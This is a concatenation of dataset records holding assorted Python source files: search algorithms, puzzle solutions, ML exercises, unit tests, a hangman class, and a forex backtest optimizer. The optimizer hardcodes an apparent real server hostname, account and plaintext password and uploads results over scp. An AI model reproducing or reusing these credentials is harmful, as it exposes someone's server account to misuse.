bfs(graph, city_begin, city_end)\n","repo_name":"FelipeFerreiraDev/Atividades-Programacao-Faculdade","sub_path":"Python/Algoritmos de busca/BFS.py","file_name":"BFS.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33245851083","text":"def day17():\r\n from collections import 
deque\r\n def takedigits(instr):\r\n starts_with_x = instr[0]==\"x\"\r\n filtered = \"\".join([x if x.isdigit() else \" \" for x in instr])\r\n return [starts_with_x]+[int(x) for x in filtered.split()]\r\n\r\n with open(\"day_17_AOC.txt\") as fh:\r\n data = [takedigits(x) for x in fh.readlines()]\r\n\r\n clayset = set([])\r\n for line in data:\r\n if line[0]:\r\n x, y0, y1 = line[1:]\r\n for y in range(y0,y1+1):\r\n clayset.add((x,y))\r\n else:\r\n y, x0, x1 = line[1:]\r\n for x in range(x0,x1+1):\r\n clayset.add((x,y))\r\n\r\n waterset=set([])\r\n flowing_water_set=set([])\r\n\r\n start_points =set([(500,0)])\r\n registered_points = set([(500,0)])\r\n\r\n minx = min([x[0] for x in clayset])\r\n maxx = max([x[0] for x in clayset])\r\n miny = min([x[1] for x in clayset])\r\n maxy = max([x[1] for x in clayset])\r\n\r\n columns_of_interest = set(range(minx-1,maxx+2))\r\n\r\n\r\n def hflow_one_side(current_row, current_col,d_col=1): # dcol = 1 when searching right and -1 left\r\n while True:\r\n cell_below = (current_col, current_row + 1)\r\n cell_ajacent = (current_col+d_col, current_row)\r\n if (cell_below not in waterset) and (cell_below not in clayset):\r\n return [\"hole\",cell_below]\r\n if (cell_ajacent in clayset):\r\n return [\"wall\",(current_col,current_row)] #return cell ajacent to wall, last cell to hold water)\r\n current_col+=d_col\r\n\r\n\r\n def do_hflow(current_row, current_col):\r\n sideflow_results= [hflow_one_side(current_row, current_col,d_col=x) for x in [-1,1]]\r\n hole_locs = [x[1] for x in sideflow_results if x[0] == \"hole\"]\r\n if len(hole_locs) ==2:\r\n if hole_locs[1] not in registered_points:\r\n registered_points.add(hole_locs[1])\r\n start_points.add(hole_locs[1])\r\n flowing_water_set.update([(col, current_row) for col in range(hole_locs[0][0],hole_locs[1][0]+1)])\r\n return([\"hole\",hole_locs[0]])\r\n else:\r\n hole_locs=hole_locs[:-1]\r\n if len(hole_locs)==1:\r\n flowing_water_set.update([(col, current_row) for col in range(sideflow_results[0][1][0],\r\n sideflow_results[1][1][0]+1)])\r\n return [\"hole\",hole_locs[0]] #return hole if one side has one\r\n\r\n return [\"walls\",[x[1][0] for x in sideflow_results]] #return column nrs for walls\r\n\r\n\r\n while start_points:\r\n #start one cascade\r\n start_loc = start_points.pop()\r\n current_col,current_row = start_loc\r\n water_vertical_flow_record=deque([(current_col, current_row)])\r\n\r\n while current_row<= maxy:\r\n cell_below = (current_col,current_row+1)\r\n if (cell_below in waterset) or (cell_below in clayset):\r\n walls_or_hole, locationdata = do_hflow(current_row,current_col)\r\n\r\n if walls_or_hole == \"hole\":\r\n water_vertical_flow_record.append((current_col, current_row))\r\n current_col,current_row = locationdata\r\n\r\n elif walls_or_hole == \"walls\":\r\n waterfields = [(col,current_row) for col in range(locationdata[0],locationdata[1]+1)]\r\n waterset.update(waterfields)\r\n\r\n return_loc = water_vertical_flow_record.pop()\r\n if return_loc == start_loc:\r\n break\r\n else:\r\n current_col, current_row = return_loc\r\n\r\n else: #we can drop down\r\n water_vertical_flow_record.append((current_col, current_row))\r\n flowing_water_set.add((current_col, current_row))\r\n current_col,current_row = cell_below\r\n\r\n def print_grid():\r\n for rownr in range(miny,maxy+1):\r\n row=[]\r\n for colnr in range(minx,maxx+1):\r\n symbol = '.'\r\n if (colnr,rownr) in clayset:\r\n symbol = \"#\"\r\n if (colnr,rownr) in flowing_water_set:\r\n symbol = \"|\"\r\n if (colnr,rownr) in waterset:\r\n 
symbol =\"~\"\r\n row.append(symbol)\r\n print(\"\".join(row))\r\n\r\n\r\n print_grid()\r\n all_water = waterset|flowing_water_set\r\n print(\"nr of water\",len([(x,y) for x,y in all_water if (y<= maxy) and (y>= miny)]))\r\n print(\"nr of stored water\",len([(x, y) for x, y in waterset if (y <= maxy) and (y >= miny)]))\r\nday17()\r\n\r\n","repo_name":"mbwillig/advent-of-code-2018","sub_path":"day_17.py","file_name":"day_17.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11808504107","text":"from itertools import repeat\r\nfrom sklearn.model_selection import ParameterGrid\r\nfrom botProto1 import *\r\nimport warnings\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"frame\")\r\nargs = parser.parse_args()\r\n\r\nwarnings.filterwarnings(\"ignore\",category =RuntimeWarning)\r\n\r\nos.system(\"taskset -p 0xff %d\" % os.getpid())\r\n\r\n\r\nclass optimizer(object):\r\n\r\n def __init__(self,n_proc,frame):\r\n\r\n self.n_proc = n_proc\r\n self.error_vals = [2.0,5.0,10.0,15.0,20.0]\r\n self.stop_vals = [0.25,0.5,0.75,1.0,1.5,2.0]\r\n self.peak_vals = [5,10,15,20]\r\n self.atrs = [5, 7, 10, 14, 21]\r\n self.results = pd.DataFrame(columns=['stop','peak','error','atr_range','sharpe','apr','acc','exp'])\r\n self.frame = frame\r\n\r\n def prep(self):\r\n\r\n self.data = backtestData(frame=self.frame,n_split=500,pairs=['EUR_USD','GBP_USD','AUD_USD','NZD_USD'])\r\n self.bot = PatternBot(data=data,instrument=pairs,pairs=['EUR_USD','GBP_USD','AUD_USD','NZD_USD'])\r\n parameters = {'stop':self.stop_vals,'peak':self.peak_vals,'error':self.error_vals,'atrs':self.atrs}\r\n self.grid = ParameterGrid(parameters)\r\n\r\n stops = [d['stop'] for d in self.grid]\r\n peaks = [d['peak'] for d in self.grid]\r\n error = [d['error'] for d in self.grid]\r\n atrs = [d['atrs'] for d in self.grid]\r\n\r\n self.grid = list(zip(stops,peaks,error,atrs))\r\n\r\n\r\n def ret_func(self,retval):\r\n\r\n retval = retval[1]\r\n\r\n now = time.time()\r\n self.results = self.results.append({'stop':retval[0],'peak':retval[1],'error':retval[2],'atr_range':retval[3],'sharpe':retval[4],\r\n 'apr':retval[5],'acc':retval[6],'exp':retval[7]},ignore_index=True)\r\n\r\n percent = 100*float(len(self.results))/float(len(self.grid))\r\n\r\n elapsed = now - self.start\r\n total = elapsed*(1/(percent/100.0))\r\n remaining = total - elapsed\r\n\r\n print(round(percent),'% ','[Sharpe APR ACC EXP] = [',round(self.results.sharpe.max(),2),round(self.results.apr.max(),2),\r\n round(self.results.acc.max(),2),round(self.results.exp.max(),2),']')\r\n print('Elapsed: ',round(elapsed),'Remaining: ',round(remaining))\r\n\r\n if round(percent)%5==0:\r\n self.results.to_csv('OptimizationResults-'+self.frame+'.csv')\r\n\r\n def search(self):\r\n\r\n self.start = time.time()\r\n\r\n p = multiprocessing.Pool(processes=self.n_proc)\r\n print(self.n_proc)\r\n results = []\r\n\r\n for x, y in zip(repeat(self.data),self.grid):\r\n\r\n r = p.apply_async(self.bot.backtest,(x,y),callback=self.ret_func)\r\n\r\n p.close()\r\n p.join()\r\n\r\n # Push Results to the Web\r\n\r\n # Create HTML Code\r\n\r\n selection = [\"' for i in zip(self.results.stop,\r\n self.results.peak,\r\n self.results.error,self.results.atr_range)]\r\n self.results['selection'] = selection\r\n\r\n ip, user, passwd = 'hedgefinancial.us', 'hedgefin@146.66.103.215', 'Allmenmustdie1!'\r\n self.results = 
self.results[['selection','sharpe','apr','acc','exp','stop','atr_range','peak','error']]\r\n        self.results.columns = [['Selection','Sharpe Ratio','APR','Accuracy','Expectancy (pips)','ATR Factor','ATR Range','Peak Parameter','Error']]\r\n        self.results = self.results.round(2)\r\n\r\n\r\n        self.results.to_csv('BTData/'+self.frame+'/master.csv')\r\n\r\n        filepath = '~/public_html/hedge_vps/Backtests/proto2/' + self.frame + '/'\r\n        additional_path = '~/Desktop/harmonics-1/Live\\ Testing/BTData/'+self.frame+'/master.html'\r\n\r\n        os.system('csvtotable '+ 'BTData/'+self.frame+'/master.csv BTData/'+self.frame+'/master.html -c \\'Available Backtests\\' >/dev/null')\r\n\r\n        cmd = 'scp -P 18765 %s %s:%s' % (additional_path, user, filepath)\r\n        os.system(cmd)\r\n        os.system('rm '+additional_path+' '+additional_path.replace('.html','.csv'))\r\n\r\n        print('***************************')\r\n        print('Exiting, Optimization Complete')\r\n\r\nif __name__ == '__main__':\r\n\r\n    #multiprocessing.freeze_support()\r\n\r\n    opt = optimizer(n_proc=4,frame=args.frame)\r\n    opt.prep()\r\n    print('Data Prepped, beginning search')\r\n    opt.search()\r\n","repo_name":"ddm-j/harmonics-1","sub_path":"Live Testing/parameter_optimization.py","file_name":"parameter_optimization.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"39997936781","text":"#Given an array of sorted numbers and a target sum, \n#find a pair in the array whose sum is equal to the given target.\n\nfrom pickle import TRUE\n\n\narr =[1, 2, 3, 4, 6]\ntarget=6\n\nleft = 0\nright = len(arr)-1\ns = 0\nwhile(left<right):\n    s = arr[left]+arr[right]\n    if(s==target):\n        print(\"success, pair found:\", arr[left], arr[right])\n        break\n    elif(s<target):\n        left = left+1\n    elif(s>target):\n        right = right-1\n\nif(s==0):\n    print(\"failure, not found\")\n\n    ","repo_name":"saibalagi006/Data-Structures-and-Algorithms","sub_path":"DSA_004_Two_Pointers_sum.py","file_name":"DSA_004_Two_Pointers_sum.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22811828145","text":"'''\nModule : Software for Digital Innovation \nAssessment : ICA-2 (Freedom Of Information)\nProject Name : Freedom Of Information\n\n@author: Mohana Kamanooru\nemail : A0223038@live.tees.ac.uk\n'''\n#########################################################\n# # File Name: test_process_SSdata.py\n# # Purpose : perform unit testing for process_SSdata.py\n#########################################################\n\nimport unittest\n\nfrom Freedom_Of_Information.views import process_SSdata\nfrom Freedom_Of_Information.views.process_SSdata import ssForce\n\n\nclass TestProcess_SSdata(unittest.TestCase):\n    \n    def test_get_filtered_flist(self):\n        ssForce_obj = ssForce()\n        ssForce_obj.get_forces_df() \n        fdict = ssForce_obj.get_filtered_flist([\"cleveland\"])\n        self.assertEqual(fdict.values[0], \"Cleveland Police\")\n    \n    def test_process(self):\n        process_obj = process_SSdata.process_SSdata('2020-11', ['cleveland'])\n        process_obj.process()\n        self.assertEqual(len(process_obj.ss_df), 592)\n        process_obj = process_SSdata.process_SSdata('2020-09', ['cleveland'])\n        process_obj.process()\n        self.assertEqual(len(process_obj.ss_df), 416)\n        process_obj = process_SSdata.process_SSdata('2020-12', ['cleveland'])\n        process_obj.process()\n        self.assertEqual(len(process_obj.ss_df), 0)\n\n\n    def test_get_forces_df(self):\n        ssForce_obj = ssForce()\n        ssForce_obj.get_forces_df()\n        self.assertEqual(ssForce_obj.force_df.size, 88)\n    \n    \nif __name__ == \"__main__\": \n    unittest.main()\n    
\n","repo_name":"mohanakamanooru/Python","sub_path":"FlaskWebFramework/Freedom_Of_Information/views/test_process_SSdata.py","file_name":"test_process_SSdata.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32998080647","text":"## Dataset : https://archive.ics.uci.edu/ml/datasets/student%2Bperformance\n## Video : https://techwithtim.net/tutorials/machine-learning-python/linear-regression/\n\n\nimport pandas as pd\nimport numpy as np\nimport sklearn\nfrom sklearn import linear_model\nimport matplotlib.pyplot as pyplot\nimport pickle\nfrom matplotlib import style\n\n\n\"\"\"STEP1\"\"\"\n#Reading students data csv\ndata = pd.read_csv(\"C:\\SelfDownload\\RegressionAlgos\\student_mat.csv\", sep=\";\")\n#print(data.head())\n\n\n\"\"\"STEP2\"\"\"\n#Choosing the features need to be used for predction (List of attributes from the data set)\ndata = data[[\"G1\", \"G2\", \"G3\", \"studytime\", \"failures\", \"absences\"]]\n\n\n\"\"\"Label that needs to be predcited\"\"\"\npredict = \"G3\"\n\n\"\"\"STEP3\"\"\"\n#Choosing the features need to be used for predction (List of attributes from the data set)\nX = np.array(data.drop([predict], 1))\n# print(\"The value of x is \\n\", X)\n\n\"\"\"STEP4\"\"\"\n#Define label (List of attributes from the data set that needs to be predicted)\ny = np.array(data[predict])\n# print(\"The value of y is \\n\", y)\n\n\n##------------------------------------------------------------------------------------------------##\n\"\"\" \n We want to achieve the best accuracy, thats why iterating over the below logic to attain the \n best results. This needs to be done only once, because once the model is trained then we can \n comment out the below code (from STEP5 till STEP8) and work.\n\"\"\"\n\nbest = 0\nfor _ in range(30):\n \"\"\"STEP5\"\"\"\n #Splitting training and testing data using train_test_split library\n x_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, test_size=0.1)\n\n\n \"\"\"STEP6\"\"\"\n #Initializing linear regression model\n model = linear_model.LinearRegression()\n\n \"\"\"STEP7\"\"\"\n #Fitiing training data into model (Training the data set here)\n model.fit(x_train, y_train)\n\n \"\"\"\"Additional Calculations\"\"\"\n #showing the score (accurancy of the predcition model)\n accuracy = model.score(x_test, y_test)\n print('Accuracy (Score) \\n', accuracy)\n\n\n \"\"\" Saving the model using pickle \"\"\"\n\n if accuracy > best:\n best == accuracy\n \"\"\"STEP8\"\"\"\n ##Saves the pickle file in the directory (Pickle just saves the model)\n with open(\"studentmodel.pickle\", \"wb\") as f:\n pickle.dump(model, f)\n##------------------------------------------------------------------------------------------------##\n\n\n\"\"\"STEP9\"\"\"\n##open a file saved by pickle\npickle_in = open(\"studentmodel.pickle\", 'rb')\n\n\"\"\"STEP10\"\"\"\n##loading pickle in linear model\nlinear = pickle.load(pickle_in)\n\n\n\"\"\"STEP11\"\"\"\n#Predicting the testing data set\npredictions = linear.predict(x_test)\n\n##Printing all the predictions,with the given input data set\nfor x in range(len(predictions)):\n print(predictions[x], x_test[x], y_test[x])\n\n\n\"\"\"STEP12\"\"\"\n##Plotting the graph\n\n\"\"\"This p below is the x axis of the graph (which means we can pick any values from the STEP2 except\n \"G3\" becasue that's thats our lable or our Y axis of the graph) \"\"\"\n\np = 'G1'\nstyle.use(\"ggplot\")\npyplot.scatter(data[p], 
data['G3'])\npyplot.xlabel(p)\npyplot.ylabel(\"Final Grade\")\npyplot.show()\n","repo_name":"rakesh-050791/machine_learning_practicing","sub_path":"LinearRegressionWithPickleExample.py","file_name":"LinearRegressionWithPickleExample.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27816462854","text":"import numpy as np\nfrom random import shuffle\n\ndef svm_loss_naive(W, X, y, reg):\n\n dW = np.zeros(W.shape) # initialize the gradient as zero\n\n # compute the loss and the gradient\n num_classes = W.shape[0]\n num_train = X.shape[1]\n loss = 0.0\n for i in xrange(num_train):\n scores = W.dot(X[:, i])\n correct_class_score = scores[y[i]]\n for j in xrange(num_classes):\n if j == y[i]:\n continue\n margin = scores[j] - correct_class_score + 1 # note delta = 1\n if margin > 0:\n loss += margin\n dW[y[i], :] += -X[:, i]\n dW[j, :] += X[:, i]\n loss /= num_train\n\n loss += 0.5 * reg * np.sum(W * W)\n dW /= num_train\n dW +=reg * W\n return loss, dW\n\n\ndef svm_loss_vectorized(W, X, y, reg):\n\n loss = 0.0\n dW = np.zeros(W.shape) # initialize the gradient as zero\n\n num_classes = W.shape[0]\n num_train = X.shape[1]\n loss = 0.0\n scores_function=W.dot(X)\n col=np.arange(0,num_train)\n margins=np.maximum(0,(scores_function-scores_function[y,col])+1)\n margins[y,col]=0\n loss=np.sum(margins)\n loss/=num_train\n loss+=0.5*reg*np.sum(W*W)\n\n num_pos = np.sum(margins > 0, axis=0)\n dscores = np.zeros(scores_function.shape)\n dscores[margins > 0] = 1\n dscores[y, range(num_train)] = -num_pos\n dW = dscores.dot(X.T) / num_train + reg * W\n\n return loss, dW\n","repo_name":"coolxid/ML-Classifiers","sub_path":"linear_svm.py","file_name":"linear_svm.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"969162562","text":"\"\"\"\n# Definition for a QuadTree node.\nclass Node:\n def __init__(self, val, isLeaf, topLeft, topRight, bottomLeft, bottomRight):\n self.val = val\n self.isLeaf = isLeaf\n self.topLeft = topLeft\n self.topRight = topRight\n self.bottomLeft = bottomLeft\n self.bottomRight = bottomRight\n\"\"\"\n\nclass Solution:\n def construct(self, grid: List[List[int]]) -> 'Node':\n def constructTree(startX, endX, startY, endY):\n if startX > endX or startY > endY: return\n\n if startX == endX and startY == endY: return Node(grid[startY][startX], True)\n\n midX, midY = (startX + endX) // 2, (startY + endY) // 2\n \n topLeft = constructTree(startX, midX, startY, midY)\n topRight = constructTree(midX + 1, endX, startY, midY)\n bottomLeft = constructTree(startX, midX, midY + 1, endY)\n bottomRight = constructTree(midX + 1, endX, midY + 1, endY)\n\n children = [topLeft, topRight, bottomLeft, bottomRight]\n\n if all([node.isLeaf and node.val == 0 for node in children]):\n return Node(0, True)\n elif all([node.isLeaf and node.val == 1 for node in children]):\n return Node(1, True)\n else:\n return Node(1, False, topLeft, topRight, bottomLeft, bottomRight)\n \n n = len(grid)\n\n return constructTree(0, n - 1, 0, n - 1)\n","repo_name":"mathewhany/leetcode-solutions","sub_path":"0772-construct-quad-tree/0772-construct-quad-tree.py","file_name":"0772-construct-quad-tree.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36038727615","text":"from . 
import conf\nfrom django.conf import settings\nfrom django.db import models\nfrom django.template.defaultfilters import slugify\n# from django.utils.encoding import smart_str\nfrom gmapsmarkers.fields import GmapsField, GeotypeField\nfrom gmaps import Geocoding\nfrom gmaps.errors import NoResults, RequestDenied, InvalidRequest, RateLimitExceeded\nfrom utils import country_to_continent, CONTINENTS\n\nimport json\n\nALLOWED_TYPES = settings.GMAPS_PLACES_ALLOWED_TYPES\nURL_TYPES = settings.GMAPS_PLACES_URL_TYPES\nGMAPS_DEFAULT_CLIENT_PARAMS = {\n 'sensor': True,\n 'use_https': True,\n 'api_key': settings.GMAPS_API_KEY,\n}\nGMAPS_DEFAULT_GEOCODE_PARAMS = {\n 'language': settings.GMAPS_LANGUAGE_CODE,\n}\n\ngmaps_api = Geocoding(**GMAPS_DEFAULT_CLIENT_PARAMS)\n\n\nclass GmapsItem(models.Model):\n geo_type = models.CharField(max_length=100)\n slug = models.SlugField()\n name = models.CharField(max_length=255)\n short_name = models.CharField(max_length=255, blank=True)\n # geocode = models.CharField(max_length=255, blank=True)\n response_json = models.TextField(blank=True)\n use_viewport = models.BooleanField(default=True)\n url = models.CharField(max_length=255, blank=True)\n custom_zoom = models.PositiveSmallIntegerField(\n blank=True, null=True, choices=[(x, x) for x in xrange(1, 22)])\n\n @property\n def geo_address(self):\n if self.geo_type in (u\"continent\", u\"country\"):\n return self.name\n name = self.short_name if self.short_name != \"\" else self.name\n geo_address = (\", \".join((self.url).split(\"/\")[2:-1]))\\\n .strip(\" -,\") + u\", {}\".format(name)\n return geo_address\n\n @property\n def geometry_latlng(self):\n try:\n results = (json.loads(self.response_json))[0]\n except (ValueError, KeyError):\n return None\n else:\n lat = results['geometry']['location']['lat']\n lng = results['geometry']['location']['lng']\n return u\"{},{}\".format(lat, lng)\n\n @property\n def geometry_bounds(self):\n try:\n results = (json.loads(self.response_json))[0]\n except (ValueError, KeyError):\n return None\n else:\n try:\n bounds = results['geometry']['bounds']\n except KeyError:\n return None\n else:\n return json.dumps(bounds)\n # return u\"{}\".format(bounds,)\n\n @property\n def geometry_viewport(self):\n try:\n results = (json.loads(self.response_json))[0]\n except (ValueError, KeyError):\n return None\n else:\n viewport = results['geometry']['viewport']\n return json.dumps(viewport)\n\n def get_response_json(self):\n result = gmaps_api.geocode(self.geo_address, **GMAPS_DEFAULT_GEOCODE_PARAMS)\n if result:\n return json.dumps(result)\n else:\n return ''\n\n def get_short_name(self):\n if self.response_json is None or self.response_json == \"\":\n return \"\"\n response_json = (json.loads(self.response_json))[0]\n for add in response_json['address_components']:\n if self.geo_type in add['types']:\n return add['short_name']\n return \"\"\n\n def __unicode__(self):\n return u\"{}({})\".format(self.slug, self.geo_type)\n\n def save(self, *args, **kwargs):\n if not self.response_json:\n self.response_json = self.get_response_json()\n self.short_name = self.get_short_name()\n\n super(GmapsItem, self).save(*args, **kwargs)\n\n\nclass GmapsPlace(models.Model):\n country = models.CharField(max_length=255, blank=True)\n administrative_area_level_1 = models.CharField(max_length=255, blank=True)\n administrative_area_level_2 = models.CharField(max_length=255, blank=True)\n administrative_area_level_3 = models.CharField(max_length=255, blank=True)\n administrative_area_level_4 = 
models.CharField(max_length=255, blank=True)\n administrative_area_level_5 = models.CharField(max_length=255, blank=True)\n locality = models.CharField(max_length=255, blank=True)\n sublocality = models.CharField(max_length=255, blank=True)\n neighborhood = models.CharField(max_length=255, blank=True)\n premise = models.CharField(max_length=255, blank=True)\n subpremise = models.CharField(max_length=255, blank=True)\n postal_code = models.CharField(max_length=255, blank=True)\n natural_feature = models.CharField(max_length=255, blank=True)\n airport = models.CharField(max_length=255, blank=True)\n park = models.CharField(max_length=255, blank=True)\n street_address = models.CharField(max_length=255, blank=True)\n street_number = models.CharField(max_length=255, blank=True)\n route = models.CharField(max_length=255, blank=True)\n intersection = models.CharField(max_length=255, blank=True)\n address = GmapsField(plugin_options={\n 'geocode_field': 'geocode', 'type_field': 'geo_type',\n 'allowed_types': ALLOWED_TYPES},\n select2_options={'width': '300px'},\n help_text=(u\"Type the address you're looking for and click \"\n u\"on the red marker to select it.\"))\n geocode = models.CharField(max_length=255, blank=True)\n geo_type = GeotypeField(blank=True)\n\n continent_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_continent_set', null=True, blank=True)\n country_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_country_set', null=True, blank=True)\n administrative_area_level_1_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_aal1_set', null=True, blank=True)\n administrative_area_level_2_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_aal2_set', null=True, blank=True)\n administrative_area_level_3_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_aal3_set', null=True, blank=True)\n administrative_area_level_4_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_aal4_set', null=True, blank=True)\n administrative_area_level_5_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_aal5_set', null=True, blank=True)\n locality_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_locality_set', null=True, blank=True)\n sublocality_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_sublocality_set', null=True, blank=True)\n neighborhood_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_neighborhood_set', null=True, blank=True)\n postal_code_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_postal_code_set', null=True, blank=True)\n\n @property\n def country_code(self):\n if self.country_item:\n return self.country_item.short_name\n else:\n return \"\"\n\n def process_address(self):\n try:\n result = gmaps_api.geocode(self.address, **GMAPS_DEFAULT_GEOCODE_PARAMS)\n except (NoResults, RequestDenied, InvalidRequest, RateLimitExceeded) as e:\n raise e\n else:\n lat = result[0]['geometry']['location']['lat']\n lng = result[0]['geometry']['location']['lng']\n self.geocode = u\"{},{}\".format(lat, lng)\n formatted_address = result[0]['formatted_address']\n self.address = formatted_address\n address_components = result[0]['address_components']\n 
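# copy every returned address component whose type is in ALLOWED_TYPES onto the model field of the same name\n 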
set_types = set(ALLOWED_TYPES)\n for add in address_components:\n inters = set_types.intersection(set(add['types']))\n if inters:\n for t in inters:\n setattr(self, t, u\"{}\".format(add['long_name']))\n self.save()\n\n def __unicode__(self):\n return u'{}'.format(self.address)\n\n def save(self, *args, **kwargs):\n url = ''\n if self.country in (None, u\"\"):\n if slugify(self.address.lower()) in [x[0] for x in CONTINENTS]:\n continent = self.address\n else:\n continent = u'undefined'\n else:\n continent = country_to_continent(self.country)\n if continent is None:\n raise NotImplementedError(\n (u\"The Country you are looking for for the current \"\n u\"address '{}' is not in our list\".format(self.address)))\n\n url += '/{}'.format(slugify(continent))\n gmap_ent, create = GmapsItem.objects.get_or_create(\n geo_type='continent', name=continent,\n slug=slugify(continent), url=url)\n self.continent_item = gmap_ent\n # set all the other types\n for tp in URL_TYPES:\n curr_type = getattr(self, tp)\n url_to_add = slugify(curr_type) if curr_type not in (None, '')\\\n else u\"-\"\n url += '/{}'.format(url_to_add)\n if curr_type:\n geocode = self.geocode if self.geo_type == tp else None\n gmap_ent, create = GmapsItem.objects.get_or_create(\n geo_type=tp, name=curr_type,\n slug=slugify(curr_type), url=url)\n gmap_ent.geocode = geocode\n gmap_ent.save()\n setattr(self, u\"{}_item\".format(tp), gmap_ent)\n super(GmapsPlace, self).save(*args, **kwargs)\n\n class Meta:\n ordering = ('country', 'address')\n","repo_name":"leotop/twentytab-gmaps-places","sub_path":"gmaps_places/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"40843713041","text":"import numpy as np\nfrom collections import deque\n\nfilename = \"input.txt\"\n\nwith open(filename, \"r\") as f:\n lines = [str(line).strip() for line in f.readlines()]\n\nscoring = {\n ')': 3,\n ']': 57,\n '}': 1197,\n '>': 25137,\n}\npair = {\n ')': '(',\n ']': '[',\n '}': '{',\n '>': '<',\n}\nscoring2 = {\n '(': 1,\n '[': 2,\n '{': 3,\n '<': 4,\n}\n\ndef parse_line(line):\n q = deque()\n for c in line:\n if c in pair:\n top = q.pop()\n if pair[c] != top:\n return (True, scoring[c])\n else:\n q.append(c)\n\n score2 = 0\n while len(q):\n c = q.pop()\n score2 *= 5\n score2 += scoring2[c]\n\n return (False, score2)\n\nresult = 0\nscores = []\nfor line in lines:\n (part1, r) = parse_line(line)\n if part1:\n result += r\n else:\n scores.append(r)\n\nresult2 = np.median(scores)\n\n\nprint(f\"Part 1: {result}\")\nprint(f\"Part 2: {result2}\")\n\n","repo_name":"alexTsaptsinos/AdventOfCode","sub_path":"aoc-2021/day10/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31503471008","text":"from HangmanLetter import HangmanLetter\n\nfrom hangman_utils import set_word\n\n\nclass HangmanWord:\n word_file = 'usa.txt'\n\n def __init__(self):\n self.word: list[HangmanLetter] = set_word(HangmanWord.word_file)\n self.guessed = False\n\n def get_word_space(self) -> str:\n word = []\n for letter in self.word:\n word.append(letter.display_letter_space())\n\n return ' '.join(map(str, word))\n\n def get_word(self) -> str:\n word = []\n for letter in self.word:\n word.append(letter.display_letter())\n\n return ' '.join(map(str, word))\n\n def update_word(self, letter) -> bool:\n new_answer = []\n correct_letter = False\n # Go 
through each letter and set to true\n for hang_letter in self.word:\n if hang_letter.letter == letter:\n hang_letter.show = True\n correct_letter = True\n new_answer.append(hang_letter)\n self.word = new_answer\n self.set_guessed()\n return correct_letter\n\n def count_remaining(self) -> int:\n count = 0\n for letter in self.word:\n if not letter.show:\n count += 1\n return count\n\n def count_total(self) -> int:\n return len(self.word)\n\n def set_guessed(self):\n if self.count_remaining() == 0:\n self.guessed = True\n","repo_name":"kenreitz27/hangman","sub_path":"src/HangmanWord.py","file_name":"HangmanWord.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31504923522","text":"import pytest\n\nimport pennylane as qml\nfrom pennylane import numpy as np\n\n\nclass TestAdjointJacobian:\n \"\"\"Tests for the ``adjoint_jacobian`` method\"\"\"\n\n @pytest.fixture\n def dev(self):\n \"\"\"Fixture that creates a device with two wires.\"\"\"\n return qml.device(\"default.qubit.legacy\", wires=2)\n\n def test_not_expval(self, dev):\n \"\"\"Test if a QuantumFunctionError is raised for a tape with measurements that are not\n expectation values\"\"\"\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(0.1, wires=0)\n qml.var(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n with pytest.raises(qml.QuantumFunctionError, match=\"Adjoint differentiation method does\"):\n dev.adjoint_jacobian(tape)\n\n def test_finite_shots_warns(self):\n \"\"\"Tests warning raised when finite shots specified\"\"\"\n\n dev = qml.device(\"default.qubit.legacy\", wires=1, shots=10)\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n with pytest.warns(\n UserWarning, match=\"Requested adjoint differentiation to be computed with finite shots.\"\n ):\n dev.adjoint_jacobian(tape)\n\n def test_hamiltonian_error(self, dev):\n \"\"\"Test that error is raised for qml.Hamiltonian\"\"\"\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.expval(\n qml.Hamiltonian(\n [np.array(-0.05), np.array(0.17)],\n [qml.PauliX(0), qml.PauliZ(0)],\n )\n )\n\n tape = 